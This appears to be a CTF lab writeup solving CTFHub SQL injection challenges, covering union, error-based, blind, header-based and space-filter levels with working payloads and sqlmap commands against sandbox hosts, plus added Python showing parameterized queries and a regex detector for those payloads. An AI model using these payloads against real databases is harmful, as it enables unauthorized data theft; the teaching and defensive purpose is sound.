CTFHub - Web - SQL Injection

Published: 2024-04-30 ⋅ Views: 27 ⋅ Likes: 0

CTFHub SQL Injection Writeup

1. Integer-type injection

1. The challenge says to enter 1, so first enter 1 and look at the result.

2. Next enter 4-1; the page returns the result of 4-1, so the expression is evaluated by the database and this is an integer-type injection.

3. Check the number of columns; the page still echoes output, so there are 2 columns.

1 order by 2

4. Determine the injection point: it is at position 2, i.e. the data column.

-1 union select 1,2

5. Query the database name; it is sqli.

-1 union select 1,database()

6. Query the table names in this database; they are news and flag.

-1 union select 1,(select table_name from information_schema.tables where table_schema='sqli' limit 0,1)

-1 union select 1,(select table_name from information_schema.tables where table_schema='sqli' limit 1,1)

7. Query the columns of the flag table.

-1 union select 1,(select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1)

8. The flag column is found; query the contents of the flag column to finally get the flag.

2. String-type injection

1. Enter 1=2; the page echoes normally.

2. Enter 1'; an error appears, so this is a string-type injection.

3. Level 1 already revealed the database version, the database name sqli, the column count and the injection point, so dump the table names directly.

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

4. The familiar news and flag tables again; follow the earlier process and dump the column names.

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'#

5. The echo is normal; continue by dumping the column contents to get the flag.

-1' union select 1,(select flag from flag)#
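The integer-type and string-type levels above come down to the same server-side defect: user input spliced into the SQL text. As an added example that is not part of this writeup or of the CTFHub challenge code, the sqlite3 snippet below models a news lookup in the vulnerable form next to a parameterized and a validated form; the table contents are constructed and sqlite3 stands in for MySQL.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the challenge's news table (sqlite3, not MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, data TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "news one"), (2, "news two"), (3, "news three")])
    return conn


def lookup_vulnerable(conn, user_id):
    """Integer-type defect: the id value is spliced into the SQL text, so the
    database evaluates 4-1 as arithmetic and honours an appended UNION SELECT."""
    sql = f"SELECT id, data FROM news WHERE id = {user_id}"
    return conn.execute(sql).fetchall()


def lookup_vulnerable_string(conn, user_id):
    """String-type defect: quoted splice. A stray quote (the 1' probe) breaks the
    statement, which is exactly the error the writeup uses to fingerprint the bug."""
    sql = f"SELECT id, data FROM news WHERE id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Same query with a bound parameter: the input is only ever a value, never SQL.
    '4-1' or '-1 union select 1,2' simply compare unequal to every id."""
    sql = "SELECT id, data FROM news WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def lookup_hardened(conn, user_id):
    """Parameter binding plus input validation: reject anything that is not a
    non-negative integer before it reaches the database, so probes fail loudly."""
    if not isinstance(user_id, str) or not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return lookup_parameterized(conn, int(user_id))


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "4-1", "-1 union select 1,2"):
        print(repr(probe), lookup_vulnerable(db, probe), lookup_parameterized(db, probe))
```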

3. Error-based injection

1. Entering 1' shows the database error echoed back, so this is an error-based injection.

2. Use the extractvalue() function to dump the database name.

1 and extractvalue(null,concat(0x7e,(database()),0x7e))

3. The database name is sqli; continue by dumping the tables, and the first table name is flag.

1 and extractvalue(null,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))

4. Continue by dumping the column names; the flag column appears.

1 and extractvalue(null,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1),0x7e))

5. Dump the column contents to get the flag.

1 and extractvalue(null,concat(0x7e,(select flag from flag limit 0,1),0x7e))

4. Boolean-based blind injection

1. Enter 1; the result is "success".

2. Enter 1'; the result is "failure", so this is boolean-based: the page only ever returns success or failure.

3. Use SQLMap directly for the blind injection; the result shows the sqli database, the other three are system databases.

sqlmap -u "http://challenge-58edc2cbdbfb94a0.sandbox.ctfhub.com:10800/?id=1" --dbs

4. Next dump the tables; the flag and news tables are found.

sqlmap -u "http://challenge-58edc2cbdbfb94a0.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

5. Dump the column contents of the flag table directly to get the flag.

sqlmap -u "http://challenge-58edc2cbdbfb94a0.sandbox.ctfhub.com:10800/?id=1" -T flag --columns --dump

5. Time-based blind injection

1. On opening the level, the same interface as before appears.

2. Following the logic of the earlier injections, construct the SQLMap command directly.

sqlmap -u "http://challenge-5ef64e08cdb2fa76.sandbox.ctfhub.com:10800/?id=-1" -D sqli -T flag -C flag --dump

3. Get the flag.

6. MySQL injection

1. This level differs from the earlier ones: the table and column names have to be obtained by manual injection. Since the database name is already known, inject directly.

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

2. With the table name obtained, continue injecting to get the column names.

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='eppymlmhfq'

3. With the column name obtained, query the column contents to get the flag.

-1 union select 1,group_concat(itcwfaaoes) from eppymlmhfq

7. Cookie injection

1. Open the page and run SQLMap on it first.

2. Dump the database names; the other three are system databases, and as usual the target is sqli.

sqlmap -u "http://challenge-a1691f4d202d9668.sandbox.ctfhub.com:10800/" --cookie "id=1" --dbs --level 2

3. Dump the table names.

sqlmap -u "http://challenge-a1691f4d202d9668.sandbox.ctfhub.com:10800/" --cookie "id=1" -D sqli --tables --level 2

4. Finally dump the data in the table's columns.

sqlmap -u "http://challenge-a1691f4d202d9668.sandbox.ctfhub.com:10800/" --cookie "id=1" -D sqli -T btnogjokyv --columns --dump --level 2

8. User-Agent (UA) injection

1. Much like the Cookie level before it; continue by dumping the database name.

-1 union select 1, database()

2. Dump the table names.

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

3. Dump the column names.

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='eovrhvzjra'

4. Dump the column contents.

-1 union select 1,group_concat(nxqsvjgwpv) from eovrhvzjra

9. Referer injection

1. The payload goes in the Referer header; dump the database name.

Referer:-1 union select 1, database()

2. Dump the table names.

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

3. Dump the column names.

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='ohixnyyvlj'

4. Dump the column contents.

-1 union select 1,group_concat(mcwfssybmd) from ohixnyyvlj

10. Space filtering

1. Inject through the URL. "Space filtering" means spaces cannot be entered, so inline comments (/**/) are used in their place.

-1/**/union/**/select/**/1,database()

2. After dumping the database name, dump the tables.

-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'

3. After dumping the tables, dump the column names.

-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=%27sqli%27/**/and/**/table_name=%27ojsuqnqjos%27

4. With the column name obtained, dump the column contents to get the flag.

-1/**/union/**/select/**/1,group_concat(ahsxijxrsv)/**/from/**/sqli.ojsuqnqjos
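The header-based levels (Cookie, User-Agent, Referer) and the space-filter level show that the same payload shapes travel in different request fields and survive trivial encoding changes, which is what a detection rule has to account for. As an added defender-side example that is not from the writeup, the Python below normalises the query string, Cookie, User-Agent and Referer of parsed requests (percent-decoding and collapsing /**/ comments) and matches the payload patterns seen on this page; the sample requests are constructed.

```python
import re
from urllib.parse import unquote

# Signatures covering the payload shapes used in this writeup: UNION-based extraction,
# extractvalue() error-based extraction, information_schema enumeration, time delays.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "information_schema": re.compile(r"\binformation_schema\."),
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\("),
}

# Request fields the challenges inject through besides the query string.
INJECTABLE_HEADERS = ("Cookie", "User-Agent", "Referer")


def normalize(value):
    """Undo the evasions seen on the page before matching: percent-encoding
    (%27, %20) and /**/ comments standing in for spaces."""
    text = unquote(value)
    text = re.sub(r"/\*.*?\*/", " ", text)          # "/**/" -> " "
    return re.sub(r"\s+", " ", text).lower()


def find_sqli(request):
    """Return [(location, signature_name), ...] for one parsed request."""
    hits = []
    sources = [("path", request["path"])]
    sources += [(h, v) for h, v in request["headers"].items() if h in INJECTABLE_HEADERS]
    for location, raw in sources:
        text = normalize(raw)
        for name, pattern in SIGNATURES.items():
            if pattern.search(text):
                hits.append((location, name))
    return hits


def scan(requests):
    """Indices of requests that trip at least one signature."""
    return [i for i, req in enumerate(requests) if find_sqli(req)]


# Constructed sample requests modelled on this writeup's payloads; not real traffic.
SAMPLE_REQUESTS = [
    {"path": "/?id=1", "headers": {"User-Agent": "Mozilla/5.0"}},
    {"path": "/?id=-1%20union%20select%201,database()", "headers": {}},
    {"path": "/?id=-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables", "headers": {}},
    {"path": "/?id=1%20and%20extractvalue(null,concat(0x7e,(database()),0x7e))", "headers": {}},
    {"path": "/", "headers": {"Cookie": "id=-1 union select 1,database()"}},
    {"path": "/", "headers": {"Referer": "-1 union select 1, database()"}},
]

if __name__ == "__main__":
    for i in scan(SAMPLE_REQUESTS):
        print(i, find_sqli(SAMPLE_REQUESTS[i]))
```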

11. Comprehensive training: SQLI-LABS

No hosted target for this one; you need to set up the environment yourself.

